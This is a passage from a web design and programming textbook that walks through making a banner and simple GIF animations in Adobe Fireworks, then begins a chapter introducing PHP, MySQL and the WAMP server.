 , click on the canvas and type the text “Contact”, if it’s not positioned like the one we have 

below, you will have to use the Pointer tool , to click and move it to that position 

 

Note. The text should be in white colour, since the last text before it “we are the best” is in white 

colour, but if not. See the page (Change text colour and properties) 

Next let’s increase the size of the text “Contact” to 20. See the step below. 

 

Change text size 
Step1. Ensure that the text is selected. 

Step2. From the Properties bar, Increase or change the text from whatever it is to 20, and press the 

Enter key. 

 

When done, reach to the Text tool again, click below the text “Contact” and type another text 

“BENGALLERY INFO. TECH.” and position it properly as we have in the screenshot below. 



Web Design and Programming by Ben Onuorah www.NEMSacademy.com/wdp 

327 

 

 

Again still with the Text tool, click and type the text “for”, just below the “BENGALLERY INFO. TECH.” 

and position it as we have done in the screenshot below. 

 

Finally use the Text tool again to type the text “WEB DESIGN and SOFTWARE DEVELOPMENT” and 

position it below the text “for” as we have done below. 

 

Now that we have all the text we need, we can now select and format the ones needs to touches.  

Let’s start with “BENGALLERY INFO. TECH.”. Select and increase its size from 20 to 30 and bold  it. 

See the screenshot below (I specify the in the Properties bar the tools I used)  
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Note: after increasing the size, I still use the Pointer tool to move and position the text properly as 

we have above. Next let’s apply the special “red emboss” effect on the text.  

 

 

Apply Fireworks Special Effects 
Step1. Ensure that the text or object is selected, in this example the text “BENGALLERY INFO. TECH.” 

Step2. Click to expand the Assets panel, at the right side of the Fireworks windows. See the 

illustrated screenshot below. 

 

As you can see we have a lot of cool stuff here to spice up our design. 
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Step4. With the text still selected, reach to the red text effect (ABC) down the list and click on it. See 

the screenshot below. 

 

Note: I’m using Fireworks CS3 and I notice that Fireworks 8 does not have this particular effect but 

you can choose any other similar effect from its asset. 

Below is what we should now have in our banner. 

 

This look great, but a closer look at the example below shows that, the BENGALLERY INFO. TECH. is 

still lacking a shadow or glow effect. 

 

Follow the steps below to apply the shadow or glow effect. 

 

Shadow or glow effect 
Step1. Ensure that the text or object is selected, in this example the text “BENGALLERY INFO. TECH.” 
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Step2. Go to the Properties bar, and click on the plus (+) sign in front of the filter, see the screenshot 

below.  

 

Step3. Point to Shadows and Glow from the menu and click Glow from the submenu, as shown in 

the screenshot.  

 

Step4. The glow would take effect immediately, although it’s result may not be what you expect, for 

example the glow colour is RED and not BLACK, so if the “Glow effect properties” box is still open 

(As shown in the screenshot below) you can change the colour from there, IF NOT you have to 

following the instruction in BY THE WAY below, before going to the next step (Step5) 

BY THE WAY: If the “Glow effect properties” box is not opened already, you may have to 

double click “Glow” from the effect list, as show in the screenshot below. 
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Step5. To change the colour, click the colour chooser (1) and click on your desire colour, in this case; 

black from palette (2), as shown in the screenshot below. 

 

The glow should now appear black around the text as we have below. 
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Now that we are done with the text “BENGALLERY INFO TECH.” we can now move our attention the 

next text “WEB DESIGN and SOFTWARE DEVELOPMENT”.  

But before we continue let’s compare both our banner and the example once more 

Our banner 

 

The example 

So we have only “WEB DESIGN and SOFTWARE DEVELOPMENT” to format; let’s start by changing its 

colour.  

As usual select, the text and click the orange-gold colour from the palette, see the screenshot below. 
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It may surprise you if I say that the “orange-gold” text colour is not the only things that the text in 

our banner has in common with the one in the example. To proof this lets have a closer look at both, 

see the screenshots below 

 

Now you can see the difference (The reflection), I will repeat once more that every lesson is meant 

to teach you something, for example this reflection would teach us how to mirror and fade object, 

either text or image. 

To create the repletion we will have to duplicate the text before mirroring and fading it, the step 

below we guide us. 

 

Creating the reflection effect 
Step1. Ensure that the text is selected. 

Step2. Duplicate the text, just as we did with the handle of the trophy earler or simply us the 

shortcut Ctrl+Alt+D below is what now have. 
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Step3. Use the Pointer tool to move the duplicated copy below it source, as I did below. 

 

Step4. With the text still selected, as shown above, we are now going to mirror it (Flip Vertically). 

From the menu, Click Modify > Transform > Flip Vertical. See the flip result below. 

 

Now that the object (text) has been flipped, we are now going to apply a transparent fade effect to 

it. See the step below. 

 

Fading 
Step1. Ensure that the object is selected, in the case the flipped or mirrored text, as show in the last 

screenshot (above) 

Step2. Click Fade Image from the menu bar. From Commands > Creative > Fade Image, see the 

screenshot below. 
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This will make the “Fade Image” option box to appear so that you can choose the type of fading that 

you want. See the next screen. 

Step3. Now click the fourth (top) option, because we want the text to be faded from down-up. See 

the screenshot below.  

 

Step4. Then click the Ok button. Below is the fade image on the text. 

 

 

BY THE WAY: this fade or transparent effect, can be apply to all type of objects either text, 

shapes or pictures. So you can try your hands on other fade options later 
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Note: after applying the fade or transparent effect, you can still adjust its direction and capacity, by 

using the nodes (as you can see in the last screenshot) this nodes work exactly like the one in 

Changing the gradient direction page, see page 303  

For example the fade capacity of the text in our banner is not of the same capacity as the one in the 

example. 

 

To adjust the fade capacity of the text in our banner, ensure that the text with the fade is selected, 

then carefully click the round node and drag it up a little. As shown in the illustration below. 

 

That all for the text, now we can compare the two (our banner and the example) once again before 

we proceed, please don’t forget to save the document. 

Our banner 

 

The example 

 

It’s obvious that all that is missing in our banner is my picture. 
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Working with bitmap  
This picture (ben.jpg) was also downloaded with the zip file, were we got the back.png (we use 

earlier for the background) from, if you’ve not download the file already please visit www. 

bengallery.com/webbook/web.zip 

 

ben.jpg 

This my picture was actually taken after an exhaustive but successful meeting, so my friends and 

partners took me out to an eatery to refresh, but because I am not usually a corporate guy, so seeing 

me looking this good and corporate was an opportunity for my friend and partner Austin to take my 

pix using his mobile phone. My point is that this picture was not taken with a high resolution camera 

or lightning, so the quality is not so good. But that is the essence of this page to see how to edit and 

improve the quality of a picture besides I want to stay clear of plagiarism.  

 

As I said in the introductory part of this chapter that Photoshop is the crown prince of digital image 

editing while Firework stood the same ground when it comes to web graphics. But the similarity 

between these two great applications is so close that some people can't really differentiate between 

them. One of the benefits of this is that you can also use Fireworks to edit and improve the quality of 

a picture as we will learn with my picture soon, even though we won’t have all the touches that 

come with Photoshop. It might even amaze you that you can do some limited animation using 

Photoshop and Fireworks, as we will learn later in this chapter, yet Adobe Flash is a better option.    

 

With the banner.png still opened… 

Step1. Open the file “ben.jpg” in Fireworks. From the menu File > Open then locate and open the 

file. 
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With ben.jpg document now the active (open), while banner.png is inactive, as shown in the 

screenshot above 

We can now use the Marquee tool  to capture only the needed area of the picture (ben.jpg), 

paste it to banner.jpg, before trimming or removing the unwanted background from the picture. 

Editing picture using the Marquee tool  

Step1. Ensure that the picture (ben.jpg) is selected. 

Step2. Click on the Marquee tool from the tool box (Bitmap subsection) see the screenshot below. 
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BY THE WAY: the Marquee tool captures in rectangular shape, you can also display its group 

tool to see the Oval Marquee tool, which captures in circular shape. 

Step3. Click and drag the Marquee tool, to captures the specify area as shown in the screenshot 

below. 

 

BY THE WAY: There is high possibility that you might not be able to capture this area easily if 

it’s your first time, so if that happens, just press the ESC (escape) key on your keyboard and 

try again from step2.   
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Step4. Now cut the selected area by using the shortcut Ctrl+X or from the menu bar Edit > Cut Note: 

you can also choose to copy instead of cut, but I prefer to use cut so that I can be certain of the 

action.  

Below is what you should now have after the cutting the marquee section. 

 

As you should know any cut or copy must be followed by past, but don’t forget that we are to paste 

this copied or cut section to banner.png document. I hope it is already opened but inactive, so click 

on it from the document bar to make it active  

 

OR if it’s not already opened, try and open it now. 

With banner.png now opened or make active, we can now paste by either using the shortcut Ctrl+V 

or via the menu bar Edit > Paste  

Below is the result of the paste on my banner.png document. 
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The picture is quite big and not in the right position. So use the Pointer tool to: 

1. Click and move it to the right, as I have done in the screenshot below. 

 

2. Reduce it size still using the proportional method, see the step below.  

BY THE WAY: The proportional method ensures that both sides of the image or object are 

adjusted at the same pace or proportion. 

Step1. Use the pointer tool. 

Step2. Hold down the SHIFT key  

Step3. Still holding down the SHIFT key click and drag picture from the down-left edge (node) see, 

the illustrated screenshot. 
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Another Option  

If you are having challenges in reducing the picture using the proportional method, you may 

consider entering the size from the Properties bar. 

Step1. With the picture still selected 

Step2. Go to the Properties bar and enter the number 190 by 150. As shown in the 

screenshot below. 

 

With the picture now reduced and positioned like what we have in the screenshot above. 

We can now start trimming the picture to remove the background. 

Don’t forget to close the ben.jpg document without saving the changes. 

Trimming picture 
Before you start please note that trimming often requires a careful view of the required object, so I 

would like you to zoom in (closer) the picture first.  
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With the picture now zoomed in as we have above we can now start trimming. 

Step1. Ensure that the picture is selected. 

Step2. Click on the Polygon lasso tool  from the tool box. See the screenshot below. 

 

Step3. Choose Feather for the Edge in the Properties bar and enter 3 for the feather amount. See 

the screenshot below. 

 

Feather will make the edges of the picture we are about to trim to appear blunt.  

Step4. Now use the lasso tool to click and trace every possible edges of the person in the picture.  

 

Note the line I bold in step4 (above) “click and trace every possible edges” so you may have to do a 

whole lot of clicking and tracing as you can see in the illustration below.   
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And it continues 

 

I often have to exit at some point, and continue later. So as not to get confuse, See what I meant 

below. 

Taken the exit 

Find a way to return (click) to the starting point, in our example, I have to click two more points (See 

picture 1 below) before clicking on the starting point, this actually select this area  (See picture 2 

below) before I press the delete key to delete the selected area (See picture 3 below) as illustration 

below.   



Web Design and Programming by Ben Onuorah www.NEMSacademy.com/wdp 

345 

 

 

Note: after deleting the selected area, you will have to press the ESC key on your keyboard, to 

remove the selection mark.   

As see in (3) the SELECTED area is now trimmed or removes, this is how we will continue until we go 

round the person in the picture and remove the background. Now let’s continue… 

Note: I may not be able to indicate (as I did earlier) to you every point I click as we continue this 

trimming, but you follow the illustrated screenshots below.     

Now click on the Polygon lasso tool  from the tool box again, and continue trimming from where 

we had stop, see the screenshots below.  

 

We continue from where we stop, as shown in the screenshots below… 
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F 

 

Now remaining the background in-between 

my hand, the trimming continues… 

 

 

I completed my trimming in (F), as you can see that the picture in (F) has no background anymore 

except for some area that is not well trimmed, we took care of this in the (below). 
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Better! It may take more time to perfect this, but I know you can do better with more practice. 

 

Now this is an overview of what we have in our banner.png  

 

 

Let now compare both pictures (our banner and the example. 

 

 

As you can see in the example at the right, we still need to edit and add some effect to what we 

currently have. 
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Hue/Saturation 
We will use this effect to change the colour and saturation of the picture. 

Step1. Ensure the picture is selected using the Pointer tool     

 

Step2. Click the plus sign (+) in front of Filter at the Properties bar. 

Step3. Point to Adjust Colour from the menu displayed and click Hue/Saturation from the sub-

menu, see the screenshot below 

 

The Hue/Saturation dialogue box will now display, as we have below. 
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Now we are going to adjust some of the options on this dialogue box. 

Note: because the Preview box has been checked by default, effect that we apply from this dialogue 

box will take effect or will be preview on the picture immediately. So In order to see the picture at 

the back of the dialogue box, I have to move the dialogue box away from covering the picture. See 

the illustration below. 

 

   

We can now start by changing the picture from colour to monochrome, by clicking on the Colorize 

checkbox. See the screenshot below and the effect on the picture too. 
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With the dialogue box still open, click and drag the Hue slider to 84 or simply type it in the textbox in 

front of the slider. Then click the OK button. See the screenshot below. 

 

Now we are through with Hue/Saturation. 

Please don’t forget to save the document, before you continue. 

We now have to expose the light and shade of the picture using curves… 

 

Curves effect 
Step1. Ensure that the picture is still selected. 
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Step2. Click the plus sign (+) in front of Filter from the Properties bar. 

Step3. Move your mouse to Adjust Colour in the menu, to display the sub-menu where you will click 

Curves… See the screenshot below. 

 

This will make the Curves… dialogue box to pop up, as we have in the screenshot below. 

 



Web Design and Programming by Ben Onuorah www.NEMSacademy.com/wdp 

352 

 

 

The curve dialogue box is a very interesting tool, as you can see the vertical line is all we need to 

adjust to achieve what we need, but we need to understand that the tonal range bar at the right, 

indicate to us the location of the vertical line to adjust in respect to what we want to expose (tonal 

range) of the picture. See what I meant in the illustration below. 

 

To further understand what this means. Take for example click and moving the vertical line from the 

center upward will brighten the picture, while moving it downward will darken the picture, as we 

have below. 



Web Design and Programming by Ben Onuorah www.NEMSacademy.com/wdp 

353 

 

 

LIGHTENED 

 

 

DARKENED 

Note: if you try any of these examples above and click OK, please don’t forget to undo (Ctrl+Z) the 

change OR Delete the point along the curve, by dragging it off the grid. 

BY THE WAY: The grid in the Curves dialog box illustrates two brightness values: 

The horizontal axis: represents the original brightness of the pixels, shown in the Input box. 

The vertical axis: represents the new brightness values, shown in the Output box. 
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When you first open the Curves dialog box, the diagonal line indicates that no changes have 

been made, so the input and output values are the same for all pixels. 

Interestingly we don’t want to lighten or darken all the area (pixels) of the image at once as we did 

with the two examples above (LIGHTENED and DARKENED) but actually wants to lighten (expose) the 

light area and darken the black area. 

 

Expose the light and darken the dark 

This will require us to combine both the LIGHTEN and DARKEN operation at once, this is the steps 

follow by an illustration. 

First repeat step 1 to 3 of the last exercise (Curves… above), this with make the curves dialogue box 

to appear as we have to below. 

  

Step4. Add a point to the center of the vertical line by clicking on it (don’t move anything yet). See 

the screenshot below to see how this will look.  
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Note: to delete a point, simply dragging it off the grid. 

Step5. Click and drag the half of the vertical line upward (closer to light), to expose or lighten the 

white pixels in the picture. See the screenshot below. 

Step6. Likewise, click and drag the other half of the vertical line downward (closer to dark), to 

darken the black pixels in the picture. See the screenshot below. 

 

Step7. Click the OK button 

The curves effect has actually helps us to distract the users or site visitors eye from see the flaws in 

the picture. For the glow effect around the picture, because we have discuss glow effect earlier in 

this chapter, I will refer you go to that pages to see the steps if you can’t remember.  
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I think that the only difference between that and this exercise is the colour of the glow, in this 

exercise chooses an orange-gold colour instead of back and the halo offset should be set to 0 instead 

of leaving it at 5. See the screenshot below. 

  

The glow should now appear around the picture as we have below. 

 

That’s all for this exercise, please don’t forget to save this change or document (Ctrl+S)  

Now that we are through with the web graphic (banner) we have to insert it to the webpage either 

using a Dreamweaver or with using the HTML image tag, but before then we have to export the 

image from Fireworks.  

Export finish work to JPG 
Step1. With the document (banner.png) still opened, click from the menu File > Export  

 

Note: since we want to use the image on the last web project we build in Dreamweaver (the ICTng 

website), it would be better we locate the website (images) folder and export the image directly to 

this location. 
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Step2. Locate the images folder of the website. For this example, the ICTng website is located at 

C:\ictng\images (see the screenshot below) before clicking the Save button. 

 

Important: notice that the exported copy of the file extension is JPG (banner.jpg - notice this in the 

File name field above), this exported JPG copy cannot be edited, while the source PNG copy 

banner.png (the original Fireworks copy) you have in your “My Picture” for example, is the editable 

copy; in a nutshell, for example if you have to add anything to your banner you open the PNG copy 

in Fireworks and after editing, you export again to JPG to replace the existing one. 

 

Below is the banner on the ICTng website, See the Dreamweaver chapter Adding image or picture 

on how to add image to a website.   
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Introduction to Animation  
Animation plays a vital role in website, first and most importantly to draw a website visitor’s 

attention to a particular message or adverts which still image (like the banner we just did) may not 

be very effective in doing, secondly with the use of animation in web design you can communicate a 

whole lot of information using a very limited space, just imaging that you a giving an advert space of 

300px by 300px to display all you product and you have about 10 products, I don’t think you would 

be able to display all of them using a still image but with animation you can display more than 10 

products in a space of 300px by 300px. 

Although animation play a very important role in website but it can also bring setback, for example, 

you will have to install a flash play to see some animation, (especially the one build with Adobe Flash 

or similar applications that produce a SWF file, which are indeed the most popular animation 

format) in some web browser. 

But SWF animation format is not the only the animation format for web, as we also have the 

animated GIF format which does not require anything to be installed on your computer unlike the 

SWF.  So one may wonder why SWF and not GIF animation the answer is simple, GIF animation also 

have a little disadvantage, actually if you are use to digital graphics you would know that even the 
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still GIF pictures doesn’t display image of higher resolution well which is why JPG remains the 

favorite option for still image; same is also applied here, the disadvantage of GIF animation to SWF 

animation is just the quality of display in pictures with higher resolutions. 

By the way: JQuery, JavaScript library: has some built-in function for display animation on 

web (most especially banner slides), this is definitely another good alternation 

The Bottom line:  

GIF animation will display on every browser but image of a higher resolution will lose some quality 

while you have no problems with those with lower resolutions. I recently ran into an ad on facebook 

by a very popular breweries company in Nigeria and it is done in GIF animation even though some 

little feel was lost but it was better than excommunicating about half of the site visitors and 

prospective customers. 

SWF animation can display animations of a very high resolution, but might not display (anything) if 

your browser doesn’t have flash player. 

So which of this two would you prefer if your clients ask you to do animated ads for the sales 

department website so that everyone visiting the company’s website will see the newly available 

services? I’m sure you will go a GIF animation so that you don’t have you boss yelling that Mr. XYZ 

can’t see the ads. 

Note: I’m not saying flash (SWF) animation is useless NO! As a matter of fact Flash is a great and very 

powerful tools animation program, besides I’m an enthusiastic user of flash, this is because there is a 

whole lot more you can do with flash than just animation, for example interaction multimedia and 

game. So when this is the case I am sure many users will have no option than to download Flash 

player which I think is actually free from adobe website.  

The point I’m trying to make here is simple, know the clients demands, consider the users and use 

the right tools for the right job, and know when to use Flash animation and when to settle for GIF 

animation. Same is also applicable to programming languages; developers or programmers often 

debate this issue “which language is better” while the answer is clear, you can’t be freelance web 

programmer in Nigeria (I don’t know of elsewhere); and you insist that Java is your only option, this 

is because some of your clients had already bought their host and 95% if not 100% is PHP supportive, 

this is because this hosting are very affordable compare to others. 

Again I’m not saying Java is not a great language or technology, beside I’m an Oracle Sun certified 

Java programmer and have developed quite a number of powerful software with it, but the point 

remains, this is not all about you the designer or programmer but also the clients and users at large, 

in which most time must come first if you want to continue to be in business. 

Now that you have understood this two important web animation format, I can inform you that the 

animation created with Fireworks is usually optimize and export in GIF animation and in this exercise 

we will be learning how to create simple animation in Fireworks.  

Humble beginning, frame-by-frame 
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Animation is such a broad topic that can have an entire book dedicated to it and some college 

abroad even offer the course as a major just like paintings, graphics or computer science, they point 

I’m trying to make here is that we might not be able to dive deep into animation as some of your 

might expecting, remember the title of this book say “Web design and programming” therefore we 

will be looking at animation only as it concern web, which is often simples ads or banner and not the 

heavy 3D character animation we see on the movies such as Shrek or Teken. Either way we look at it, 

animation is not actually a new field of study cause by the 20th century technological boom (even 

though this has advanced it a lot, just like every field of discipline), because I found out that the 

humble beginning of this interesting field started around early 19th century, with the flip book being 

early popular animation devices invented during this period.  

Also according to Wikipedia, Animation is the rapid display of a sequence of images to create 

an illusion of movement. The most common method of presenting animation is as a motion 

picture or video program, although there are other methods.  For example the sequence of 

images below, representing a bouncing   

 

Source: Wikipedia 

Surprisingly this sample simple animation technique is still very relevance today, and it is called 

frame-by-frame animation, and I think we should start by using the frame-by-frame method to 

create a simple animation in Fireworks. 
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Frame-by-frame animation using Fireworks 
Start Fireworks and setup a new document with canvas size 500px by 300px. See Creating new files 

in Fireworks, in the early pages of this chapter, the screenshot should appear like what we have 

below. 

 

Please expand (open) the panel’s bar, as illustrated in the screenshot above (if not already 

expanded), by clicking the expand/collapse button (see the pointing arrow, above). 

 

Save the document as “advert.png”, you can use the shortcut Ctrl+S 

This aim of this exercise is to display five of our services/product using of animation.  

 

1. Now click on "Pages and Layer and Frames and History" if you are using Abode Fireworks CS or 

"Frames and History" in Macromedia Fireworks 8,  

2. If the Frames panel is not active, you will have click on it from this panel. See the screenshot 

below. 
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Screenshot for Abode Fireworks CS 3 

 

Screenshot for Macromedia Fireworks 8 

As you can now see from the Frames panel that we are already in Frame1, to keep things simple for 

I will type one of the services on this frame (Frame1)  

Use the text tool  from the toolbox, as we did in the last exercise, to type and format the text to 

appear as we have it in the canvas below.   
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Please format the text using the speciation indicated ‘below’ the screenshot above. That is (bold text, 

size50, colour: red); bold the text, increase or set its size to 50 and change its colour to red, all this 

have been covered in previous exercise of this chapter. 

 

This content or text “WEB DESIGN” has now occupied Frame1, although you can have any or more 

content from pictures to shapes but to keep this exercise simple that’s why I settle for just a simple 

text.   

Let’s now add a new frame to hold the second service. 

This can be done by clicking the plus + (New/Duplicate Frame) sign just below the Frames panel, see 

the screenshot below. 
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Immediate you click the + sign; the canvas will turn white, this means that you are already in 

Frame2, notice the “Frame2” below the Frame1 in the panel. See the screenshot below. 

 

Note: you can go to any frame from the list by clicking on it, for example if you click on Frame1 from 

this list, it will make Frame1 to be the active or open frame and you will see the text (WEB DESIGN) 

on the canvas. 
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With Frame2 being the active or open frame, we can now type our second service on its canvas as 

we have below. 

 

Bold text, size50, colour: blue 

Follow the same steps (as we did above) to add Frame 3 and type the third service as we have 

below. 

 

Bold text, size50, colour: green 

Use the same steps also, to add Frame 4 and Frame 5 and type their content respectively as we have 

below. 
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Bold text, size50, colour: brown 

 

 

Bold text, size50, colour: purple 

 

That all, we are through with the animation, to test the animation click the play button  below 

the canvas space, See the screenshot below. 
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Ops! The animation plays too fast on my computer, I hope it’s the same in yours; let’s reduce the 

trimming, by setting the frame delay.  

Setting the frame delay 

This can be done from the frames list, you could notice the frame delay beside each frame name, see 

the screenshot below. 

 

The default frame delay is 7 microseconds; the time measurement of the frame delay can be a little 

confusing, for example the 7 microseconds is less than 1 second, which is why when you play the 

animation the Frame 1 for example didn’t stay that long before leaving for the next frame, same 

goes to the others since their delay are all 7 microseconds       

If you care to know, this is how it is measure: (1 second = 100 microseconds)  

For example I want Frame 1 to wait (delay) for 3 seconds, to do this I simply double-click the frame 

delay for Frame1 (where we have 7) and type 300 and deselect when done, see the illustration 

below. 
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By the time this animation is played again, you will notice a longer delay for Frame 1, you can also do 

this to the other four frames if you wish, however if it is too slow you could set them to 100, if this is 

done the frame delays will now appear as we have below. 

 

This animation, is a skeletal work to get you a simple understand frame-by-frame animation, I 

purposely made it simple (that is; without background or pictures), in the next exercise with will add 

a background to the animation.   

To add a background colour, for example light yellow #FFFF66 or any colour, is as simple as changing 

the canvas colour, as show in the screenshot below, this canvas colour will take effect on all the 

frames. 
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At the right, is the background 

colour, on Frame 2. 

However this overflow won’t 

be possible if we have picture 

or image as or on the 

background, we will have to 

understand Layers and use 

Share across frames, Which is 

why the next exercise, is 

important.  

 

 

Adding picture to the background of the animation 

The essence of this lesson is not just about adding a background, but also organizing your work with 

layer to aid easy management like sharing a layer across frames, let’s see what this new terms 

mean. 

Layers: Every object in a document resides on a layer, just as we have in similar application 

such as Photoshop and Flash. Layers becomes very handy as your work gets bigger, for 

example doing an animated cartoon in Flash would be a big mess and even impossible if you 

can cannot organize, for example the background and individual character into different 

layer, same also hold truth with Fireworks, so continue with the advert.png (animation) 

we’ve been working on. 

Remember the zip file we downloaded from www.bengallery.com/webbook/web.zip and unziped, 

containing the images we use in the Dreamweaver’s ICTng project exercise, please return to the 

project and locate the image file tech.jpg from the images folder, (please if you have not 

downloaded the zip file, please do from the web address above, and unzip it) and open it in 

Fireworks, as I did below.  

Steps 

1. Right-click on the file tech.jpg (a pull down menu will appear) 

2. Point to Open with to display the sub-menu 

3. Click Fireworks 8 (yours may be Fireworks CS) 

 

http://www.bengallery.net/webbook/web.zip
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This will open the image tech.jpg in Fireworks as we have below. 
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I believe the last animation exercise advert.png is still open, as I pointed with the arrow; it’s the 

inactive document, while tech.jpg is the active or open document. We will copy this image on 

tech.jpg from Fireworks and will past it on advert.png so if your advert.png is not opened in 

fireworks please do so. 

1. Use the Pointer tool  to click or select image (it’s the only image on the document) 

 

2. Then copy the image, from the menu bar Edit > Copy or use the shortcut Ctrl+C 

3. Click the advert.png tab from the document bar, to make it active (open) and paste the copied 

image, from the menu bar Edit > Paste or use the shortcut Ctrl+V 

 

When pasting a pop-up box to appear (as we have above), click the Don’t Resample button. 
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Now the image should now cover this screen, as we have below. 

 

 

Now let’s send the picture or image to the back of the text 

1. Use the Pointer tool  to right-click on the image; this will cause a pull-down menu to appear as 

we have below. 

 

2. Point to Arrange from this pull-down menu and click Send to back from the sub-menu. 

Note the other Arrange options, most especially Bring to Front, in case you want to bring an 

item to the front. 

 

The image should now appear at the back of the text as we have in the screenshot below. 
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To make the image fill the entire canvas space, I selected it and set its size on the properties bar to 

500 by 300, see the screenshot below. 

 

Please expand the Frames and History panel if not already expanded, when this is done your screen 

should appear as we have below.  
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Now click Frame 2, from the Frames and History panel list 

 

As you can see in this Frame 2, the background image we have in Frame 1, does not appear in other 

frames, instead of coping and pasting the image in all the Frames (which is tedious, if we have; for 

example 100 Frames and what happens if we need to make changes to the background image), this 

is where Layers and Sharing a layer across frames becomes helpful. 

So what we need to do is to (first go back to Frame 1) create a new layer, but the background image 

into the newly created layer and share the layer across frames.  
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Preset Fireworks Animation 
The frame-by-frame technique is no doubt easy to use and understand as you can see, but this 

method is however not suitable or can be extremely difficult for a more complex animation for 

example you want a text or images to fade, twist or zoom out or in, this type of animation can 

stretch between 7 to 10 or even more frames at once, this can be done in Adobe Flash using tween 

animation while in Fireworks you can settle for the preset options from the Animation dialogue box 

as you will learn soon. 

Note, If an animation is more complex, it may be out of the scope of Fireworks, take for example if 

you are to animate a 3 minutes cartoon, I will advise to you settle for a more dedicated professional 

animation application like Flash, although often web animations don’t get this complex, but if does, 

the visitors cannot but sacrifice to download and install a Flash player, because Flash animation will 

likely be the best option.   

Now let’s explore the preset animations. In this exercise will be animating this piece is text “Learn 

Web Design and Programming”. 

Just as we have treated in previous chapters, Start Fireworks and setup a new document with canvas 

size 500px by 300px. Creating new files in Fireworks, and ensure the Frames panel is expanded, and 

below is what your screen should look like. 

 

Note that I saved this document as “PresetAnimation”. 

1. Type the first word of the text “Learn” and increase its font size to 30 and bold it, the font 

style is in Arial.  
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2. Position it to left, as I did in the screenshot below; we are going to make it move from this 

position to center. 

 
 

3. Ensure that the text “Learn” is select, then click from the Menu bar Modify > Animation > 

Animation Selection (see the screenshot below)  

 

 

this will pop-up the Animation dialogue box (as we have below)  
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this box contains the preset animation options available in Fireworks. 

 

Below is a brief description of the jargons we have in this little box, and by simply manipulating 

your way around these options you may create a simple cool animation, for example by setting 

the Opacity to begin from 100 and end in 0, you will make a text or image to fade away.  

 

4. To move the text “Learn” to center position, I set the Move to 200 (that means move 

further away from this left position), and leave the Direction as 0, (which means move to 

the right direction).  I click the drop-arrow of the Direction, to show how this looks like, in 

the screenshot below. 
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5. Now click the OK button, to complete the animation. Below is what my screen looks like, after 

clicking OK. 

 
Repeat the steps above to animate this other words “Web Design and Programming” so you 

should have “Learn Web Design and Programming” in this animation when you are done.  

 

If you want to be inquisitive enough, you will try other Preset Animation options; as we have in 

the dialogue box below.  
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Exporting Animation 
After you have completed your animation in Fireworks you need to export it as Animated GIF before 

include it in your webpage, just as you did with Images. To do the export we must first optimize it, 

before doing the export. Below is the steps on how to this. 

 Optimize as Animated GIF 

 Note: if you skip this step the animation will not play after exporting it.  

1. Ensure that the animated page is open 

2. Locate the Optimize panel at the top right,  

 

 
 

3. And click and select Animated GIF WebSnap 128 from the drop-down menu 
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This will ensure that the animated images is optimized to the exported as Animated GIF 

 

 

Exporting the Animated GIF 

As a continuation… 

4. Click on File menu, and Export from the dropdown  
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5. This will cause the Export box, to pop-out, so I just the Export button from the dialogue box 

 
as you can see in the File name box, is exported with GIF expansion, PresetAnimation.gif  

 

Therefore you can open this file like any other image file, or insert it into your webpage as 

you do with any other image. 

There are so much more I would have love to cover on Fireworks in this chapter, but space and time 

may not permit me, beside the volume of this book must be within a range, hopefully if this book 

end being published in editions, I am likely to tech you more on Fireworks but for now let’s get dirty 

a little with coding in the next PHP chapter.  
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CHAPTER 5 

PHP AND MYSQL 
 

When I thought of PHP, I see a language built by a web developer, for web developer, PHP hit the 

scene in 1995, today without a doubt I can tell you that it is the most popular language for building a 

dynamic website and application most especially the type that interact with a database, just like a 

bread and butter, PHP have a partner, another popular open-source database, MySQL. Today you 

hardly can talk PHP without its MySQL database partner.  

Although, although critics who a sometimes computer scientist and novice alike, criticize PHP for 

lacking in this or lacking that, but the fact is every technology or language has its cons and pros, and 

for PHP some of its pros includes: 

Open-source and free: although the open-source part of PHP may be of little value to a typical 

Nigerian computer scientist or majority of its users, but I’m sure the free part is of more value to an 

average user. PHP is not only free but takes less than 20 minute to download the WAMP or LAMP 

server, install and start building PHP web application, this is what its competitor have not been able 

to do. Let’s be sincere most web developers are also web designers so they don’t often have the 

time to start downloading and installing JDK, Eclipse, Tomcat, and configuring swing or buying Oracle 

database license just because they want to program a website, let alone the hosting pains, all this 

cost a lot of money and time to setup compare to downloading one free WAMP server and in less 

than 20 minute you are programming your web and this is why PHP is popular. 

Simple to program: As I said earlier most web developer also does web design, and design takes 

about half of their time when handling a web project. So majority of them don’t have the time to 

declare all variables types type, create a class, method, properties and do all those object oriented 

programming stuff before talking about compiling issues and packaging issues and this why PHP wins 

big time compare to its rivals such as C++, Java or .NET, because its designer is a web developer and 

he understood this.  

 

I won’t waste more of your time comparing languages, as I’ve said before every language have their 

strength and downside, I do use Java, .NET, PHP and other older languages, besides computer 

science is more than learning a  programming language; however if today I have to learn a new 

language to solve a particular problem I will simply do. So stick with PHP for now if are new to 

programming and you are sure you will be in the web scene for a long time. 

 

Below are some few other things I got from PHP and MySQL Bible that you should know about PHP 

and MySQL in brief. 
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 PHP stands for PHP: Hypertext Preprocessor. The product was originally named Personal 

Home Page Tools, and many people still think that’s what the acronym stands for. But as it 

expanded in scope, a new and more appropriate (albeit GNU-ishly recursive) name was 

selected by community vote. 

 PHP is a server-side scripting language, which is basically embedded into HTML. 

 Rasmus Lerdorf: creator and original driving force behind PHP. The first part of PHP was 

developed for his personal use in late 1994. 

 Zeev Suraski and Andi Gutmans, the two Israeli programmers who developed the PHP3 and 

PHP4 parsers, have also generalized and extended their work under the rubric of Zend.com 

(Zeev, Andi, Zend, get it?). 

 History of MySQL can be traced as far back as 1979, when MySQL’s creator, Monty 

Widenius, worked for a Swedish IT and data consulting firm, TcX. 

 By early 1995, TcX had a 1.0 version of this new product ready. They gave it the moniker 

MySQL and later that year released it under a combination open source and commercial 

licensing scheme that allowed continued development of the product while providing a 

revenue stream for MySQL AB, the company that evolved from TcX. 

 Over the past ten years, MySQL has truly developed into a world class product. MySQL now 

competes with even the most feature-rich commercial database applications such as Oracle 

and Informix. 

 In 2008, Sun Microsystems, the owner (then) of Java, bought MySQL, while in 2010 Oracle 

corporation, the owner of the oracle database bought Sun Microsystems, this make them 

the current owner of MySQL 

 

Install and Test WAMP Server 
To develop PHP/MySQL web application you definitely need to install the following: a web server, 

preferably Apache web server, follow by the PHP application server or engine then finally the MySQL 

server, I was one of the few people who have to  install all these individually this can be painful and 

time taken from a beginner, thankfully the PHP community is full of too many creative, concern and 

wonderful young minds, who have thought it through to develop a SINGLE installation program to do 

all this for you, and the project is called WAMP for Windows version or LAMP for Linux user, in case 

you don’t know, WAMP is an acronym  for: 

W: Windows, the operating systems (or) L: for Linux 

A: Apache an open server web server, from Apache software foundation, just like the Microsoft IIS 

